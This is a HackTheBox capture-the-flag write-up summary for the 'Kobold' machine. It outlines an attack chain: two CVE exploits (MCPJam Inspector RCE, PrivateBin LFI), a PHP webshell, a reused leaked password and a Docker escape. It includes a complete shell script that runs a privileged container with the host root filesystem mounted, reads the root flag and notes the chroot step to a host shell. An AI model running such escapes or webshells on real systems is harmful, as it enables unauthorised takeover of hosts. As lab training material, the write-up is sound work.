Kobold HackTheBox Writeup - Season10
SUMMARY
Kobold is a Linux machine from HackTheBox Season 10 that chains two CVEs across MCPJam, PrivateBin, and Docker to reach full root access. Virtual host enumeration on kobold.htb reveals two subdomains serving PrivateBin 2.0.2 and MCPJam Inspector 1.4.2 respectively. MCPJam Inspector 1.4.2 is vulnerable to CVE-2025-49596, a critical unauthenticated RCE caused by missing authentication between the Inspector client and its proxy. Exploiting it yields an initial shell on the target.
Internal port enumeration reveals port 8080 running the same PrivateBin 2.0.2 instance as the one discovered in our initial enumeration. This version is vulnerable to CVE-2025-64714, a Local File Inclusion via the template-switching cookie. Writing a PHP webshell to the world-writable data directory and triggering it through the LFI achieves RCE inside the PrivateBin Docker container.
Enumerating mounted paths inside the container exposes the PrivateBin configuration file, which leaks a password that is reused for the Arcane Docker management panel on port 3552. Creating a privileged MySQL container through Arcane with the host filesystem bind-mounted lets the root flag be read directly from the mount.
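The last step is a generic Docker escape rather than anything specific to Arcane: whoever can create a container with the host root bind-mounted can read any host file, and --privileged on top of that only adds device access. The script below is an added example, not part of this writeup or of Arcane; it shows the docker CLI equivalent of what the panel is asked to do. The image name, the mount point /host and the flag path are assumptions. The script mounts itself into the container and re-runs in "verify" mode, where it first checks that /host really is the host's root (and not the container's own) before reading the flag.

```bash
#!/bin/sh
# Added example (not from the original writeup): privileged container with the
# host root bind-mounted, then read the root flag from the mount.
# Assumptions: IMAGE, MOUNT and FLAG below; docker CLI reachable when launching.

IMAGE="${IMAGE:-mysql:8}"        # assumption: any image that ships /bin/sh works
MOUNT="${MOUNT:-/host}"          # assumption: where the host root is mounted
FLAG="${FLAG:-/root/root.txt}"   # usual HTB root flag location

# Heuristic check that DIR is the host's root filesystem and not the container's:
# it must have /etc and /root, and its hostname file must differ from the one
# the container sees (Docker gives containers a random short-id hostname).
is_host_root() {
  dir="$1"
  [ -d "$dir/etc" ] && [ -d "$dir/root" ] || return 1
  [ -f "$dir/etc/hostname" ] || return 1
  [ "$(cat "$dir/etc/hostname")" != "$(cat /etc/hostname 2>/dev/null)" ]
}

# Run inside the container: confirm the mount, then read the flag.
# A full host shell is one step further: chroot "$MOUNT" /bin/sh
verify() {
  if is_host_root "$MOUNT"; then
    echo "[+] $MOUNT is the host root filesystem"
    cat "$MOUNT$FLAG"
  else
    echo "[-] $MOUNT does not look like the host root" >&2
    return 1
  fi
}

# Run from a host that can talk to the Docker daemon: this is the CLI equivalent
# of the container the management panel was asked to create. The script mounts
# itself read-only at /escape.sh so the same file runs the verify step inside.
launch() {
  self="$(realpath "$0")"
  docker run --rm -i --privileged \
    -v /:"$MOUNT" \
    -v "$self":/escape.sh:ro \
    "$IMAGE" sh /escape.sh verify
}

case "${1:-}" in
  launch) launch ;;
  verify) verify ;;
  *) ;;   # sourced or run without a mode: define functions only
esac
```

Usage: ./escape.sh launch. Keep the verify step even when a panel, not the CLI, created the container: a mount that silently points at the container's own root is the most common reason a flag read "fails" after an otherwise successful escape.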
PATH TO FOLLOW
- Reconnaissance
- Virtual Host Enumeration
- MCPJam Inspector 1.4.2 - CVE-2025-49596
- Initial Shell
- Internal Port Enumeration
- PrivateBin LFI - CVE-2025-64714
- PHP Webshell Upload
- Container Mount Enumeration
- Arcane Docker Management Panel Access
- Privilege Escalation through Container Creation
CONTENT WILL BE RELEASED ONCE THE MACHINE IS RETIRED